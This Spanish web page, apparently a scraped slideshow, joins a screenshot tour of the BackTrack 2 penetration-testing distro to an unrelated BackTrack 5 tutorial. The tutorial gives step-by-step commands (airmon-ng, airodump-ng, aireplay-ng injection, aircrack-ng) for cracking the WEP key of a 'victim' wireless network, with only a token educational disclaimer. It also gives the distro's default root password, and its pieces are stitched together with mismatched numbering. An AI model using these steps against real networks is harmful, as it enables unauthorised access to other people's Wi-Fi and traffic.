la próxima liberación de máquinas virtuales para VMware, Kriptópolis se ha adelantado y he creado una máquina virtual desde VMWare Workstation a partir de la ISO descargada (casi 700 MB). Como siempre, este juego de pantallas trata de mostrar -a grandes rasgos- lo que se encontrará el usuario que se aventure en BackTrack. Arrancando BackTrack:
  • 10. Llegamos al login. Deberemos emplear root como nombre de usuario y toor como contraseña. Una vez logueados, teclearemosstartx para acceder a un escritorio KDE o bien flux si optamos por FluxBox. Arrancaremos KDE:
  • 11. Mientras arranca KDE ya vemos que el diseño es sobrio pero agradable y muy cuidado:
  • 12. Así luce el escritorio de BackTrack2 sin desplegar ningún menú:
  • 13. Vamos a desplegar algún menú a modo de ejemplo. Por ejemplo el titulado BackTrack, que es donde se encuentra todo el meollo de esta distro. Por ejemplo, esta es la opción de herramientas misceláneas:
  • 14. Sólo con echar un vistazo al resto de menúes de la imagen anterior ya os podéis imaginar lo que dan de sí más de 300 herramientas. Así luce Metasploit, la bestia parda, perfectamente configurado y en marcha:
  • 15. Sí; si te has fijado en la esquina inferior derecha de la imagen anterior, BackTrack incluye también un Firefox 2.0.0.2 "torificado". En fin; espero haberos despertado el interés por esta magnífica distribución. Dejo a vuestro cargo seguir explorando sus posibilidades. Yo, de momento, salgo de KDE, tecleo halt y cierro el kiosco: Aclaración;"Este post es con fines Educativos y/o Didácticos, no me hago responsable del uso malicioso" Para emplear todo este proceso necesitas tener una interfaz de red inalámbrica (Wifi). Tener BackTrack 5 :No me digas: y un poco de conocimiento en GNU/Linux (saber usar la Terminal) Descarga Personalizada Primero vamos a la pagina de descarga de BackTrack 5
  • 16. BackTrack Download Descarga Personalizada Escojan versión: Yo elegí Backtrack 5 R3 Windows Manager (manejador de vetanas): Yo elegí gnome, ya que para mi es mas cómodo Escojan su arquitectura: Mi arquitectura es de 32bits Tipo de Imagen: ISO (100% Recomendable) Tipo de descarga: Directo (Descarga Directa) Nota la ISO pesa mas de 3Gb así que si y tienes una conexión lenta descarga el torrent para descargarlo en 2 días como máximo con el programa Utorrent Descarga Directa, Si tienes una buena conexión Backtrack 32 bits 3,3Gb BackTrack 64 bits 3.1Gb Booteamos Backtrack 5 USB Mínimo 4 Gb DVD Mínimo 4.7 Gb Programa para bootear en una Pendrive Pueden usar linuxLiveUSB Home LinuxLiveUsb o UNetbootin Home UNetbooting Yo usaré UNetbooting Download Un Pequeño MiniTuto
  • 17. 1.- Aquí escogerán la distribución a instalar, en este caso es BackTrack 5. 2.- Elegirán la versión de la distribución. 3.- Selecciona la ruta donde se encuentra la imagen ISO de BackTrack 5. 4.- Selecciona el tipo de unidad, puede ser un Pendrive o un Disco duro. 5.- Selecciona la letra de la unidad. 6.- Esta opción se seleccionara automáticamente al hacer todo bien. 7.- Ahora dan clic en aceptar y comenzara la instalación en la memoria, después de unos minutos el proceso terminara y ya podemos ejecutar el Backtrack 5 desde una Memoria USB. Programa para bootear en una DVD Usen nero 9 algo parecido, ustedes sabrán Ahora si empezemos 1. Paso: Saber el nombre de nuestra interface (Targeta Wireless) para colocar en Modo Monitor, para esto abrimos una terminal y escribimos lo siguiente: Cita: Ocultar airmon-ng Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0 2. Paso: Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente: Cita: Ocultar airmon-ng start wlan0
  • 18. Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor. 3. Paso: Ahora vamos a escanear redes disponibles con el siguiente comando: Cita: Ocultar airodump-ng mon0 y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c 4. Paso: En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando: Cita: Ocultar airodump-ng -w redes -c 11 --bssid 00:22:A4:30:FE:59 mon0 donde -w = especifica el nombre del archivo donde se guarda la captura de datos -c = especifica el canal de la Red --bssid = especifica Mac de Punto de Acceso mon0 = especifica la interfaz de la targeta de Red en Modo Monitor 5. Paso: Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente: Cita: Ocultar aireplay-ng -1 0 -a 00:22:A4:30:FE:59 mon0 esto es para Asociar su pc con la Red Víctima 6. Paso: Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente: Cita: Ocultar aireplay-ng -3 -b 00:22:A4:30:FE:59 mon0 con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave 7. Paso: Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando: Cita: Ocultar aircrack-ng redes-01.cap
  • 19. redes =archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3 damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada Cita: Ocultar Key Found¡ (09:86:23:47:63) Y en dado caso de qué no entiendan un carajo¡ ahi les dejo 2 Vídeos - See more at: http://www.identi.li/index.php?topic=117891#sthash.ieDDud00.dpuf ¡A disfrutar! BackTrack